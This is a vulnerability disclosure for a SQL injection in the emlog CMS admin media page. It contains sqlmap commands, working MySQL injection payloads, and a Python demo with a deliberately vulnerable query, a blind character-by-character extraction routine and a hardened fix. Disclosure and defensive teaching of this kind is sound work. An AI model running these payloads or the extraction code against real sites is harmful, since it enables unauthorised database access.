CVE-2023-41623
[Discoverer]: wuhaozhe
[NAME OF AFFECTED PRODUCT(S)]: https://github.com/emlog/emlog
[AFFECTED AND/OR FIXED VERSION(S)]: https://github.com/emlog/emlog - pro2.1.14
[Affected Component]: source file: media (the admin media page); affected code: $DB = Database::getInstance(); $uid = Input::getStrVar('uid'); affected URL: /admin/media.php
[Vulnerability Type]: SQL injection
[Impact]: An attacker holding an authenticated admin session can read internal information from the database through the injectable uid parameter.
Method of reproducing the vulnerability
First, after logging in to the admin account, open /admin/media.php?uid=1. This page lists the images uploaded by the given user; the uid parameter is read with Input::getStrVar('uid') and passed on to the database query. Because the page requires an authenticated session, capture the administrator's request (including the session cookie) with Burp Suite and save the raw request to a text file. Then run sqlmap against that request file:
sqlmap -r <administrator request file> --batch --level 3
sqlmap scans the uid parameter and reports the payloads that work (listed below). Once the injection is confirmed, use --dbs to enumerate the databases:
sqlmap -r /home/kali/nmapscan/cms.txt --batch --level 3 --dbs
> /admin/media.php?uid=1
> The following are the payloads found by sqlmap. The three techniques confirm the injection independently: the error-based payload forces a MySQL duplicate-key error whose message carries query output, the time-based payload delays the response with SLEEP(5), and the boolean-based payload compares the page returned for a true and a false condition.
> Parameter: uid (GET)
>     Type: error-based
>     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
>     Payload: uid=1 AND (SELECT 6975 FROM(SELECT COUNT(*),CONCAT(0x716b6b7a71,(SELECT (ELT(6975=6975,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
>
>     Type: time-based blind
>     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
>     Payload: uid=1 AND (SELECT 6627 FROM (SELECT(SLEEP(5)))Rfyy)
>
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: uid=1 AND 4765=4765
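The following is an added example, not code from emlog or from this report. It models the reported pattern (a raw uid string spliced into the media query) next to a hardened handler that validates and binds the parameter, then shows what sqlmap's boolean-based blind probe (the "uid=1 AND 4765=4765" payload above) does with each, and how the same true/false oracle is used to extract data character by character. The media table, its columns and rows are constructed for the example; SQLite stands in for MySQL, so the MySQL-only error-based and time-based payloads are not exercised here.

```python
import sqlite3
import string

# Constructed in-memory table standing in for emlog's media table. The column
# names and rows are an assumption for this example, not emlog's real schema.
SCHEMA = """
CREATE TABLE media (id INTEGER PRIMARY KEY, uid INTEGER, filename TEXT);
INSERT INTO media VALUES (1, 1, 'avatar.png'), (2, 1, 'banner.jpg'),
                         (3, 2, 'board-minutes.pdf');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_media_vulnerable(conn, uid):
    """Query shaped like the reported pattern: the raw 'uid' string from the
    request is spliced straight into the SQL text. Vulnerable by design."""
    sql = "SELECT filename FROM media WHERE uid = %s ORDER BY id" % uid
    return [row[0] for row in conn.execute(sql)]


def list_media_hardened(conn, uid):
    """Hardened form: insist that uid is an integer, then bind it as a
    query parameter so its value can never become SQL syntax."""
    try:
        uid_int = int(str(uid).strip())
    except ValueError:
        raise ValueError("uid must be an integer")
    rows = conn.execute(
        "SELECT filename FROM media WHERE uid = ? ORDER BY id", (uid_int,)
    )
    return [row[0] for row in rows]


def make_fetch(conn, handler):
    """Present a handler the way an attacker sees it over HTTP: a response
    body (here, the tuple of filenames) or a generic error marker."""
    def fetch(uid_param):
        try:
            return tuple(handler(conn, uid_param))
        except Exception:
            return ("error",)
    return fetch


def boolean_blind_oracle(fetch, base="1"):
    """sqlmap's boolean-based blind probe: append a condition that is true
    and one that is false, and check that only the true one keeps the
    baseline response. The hardened handler fails both, so no oracle."""
    baseline = fetch(base)
    true_resp = fetch(base + " AND 4765=4765")
    false_resp = fetch(base + " AND 4765=4766")
    return true_resp == baseline and false_resp != baseline


def blind_extract(fetch, subquery, max_len=64, base="1"):
    """Turn the true/false oracle into data extraction: test each position of
    the subquery's result against an alphabet until no character matches."""
    baseline = fetch(base)
    alphabet = string.ascii_letters + string.digits + " -_./"
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = "%s AND substr((%s),%d,1)='%s'" % (base, subquery, pos, ch)
            if fetch(probe) == baseline:
                out += ch
                break
        else:
            break  # no character matched: end of the string
    return out


if __name__ == "__main__":
    conn = open_db()
    vuln = make_fetch(conn, list_media_vulnerable)
    safe = make_fetch(conn, list_media_hardened)
    print("vulnerable handler injectable:", boolean_blind_oracle(vuln))
    print("hardened handler injectable:  ", boolean_blind_oracle(safe))
    # Another user's file name, read out through the uid=1 page only.
    print(blind_extract(vuln, "SELECT filename FROM media WHERE uid=2"))
```

The oracle is the whole point of the boolean-based finding: the page for uid=1 is the "true" response, and any condition the attacker appends is answered by whether that page comes back unchanged. Rejecting non-integer input and binding the value removes the oracle entirely, which is why the hardened handler answers every probe with the same error.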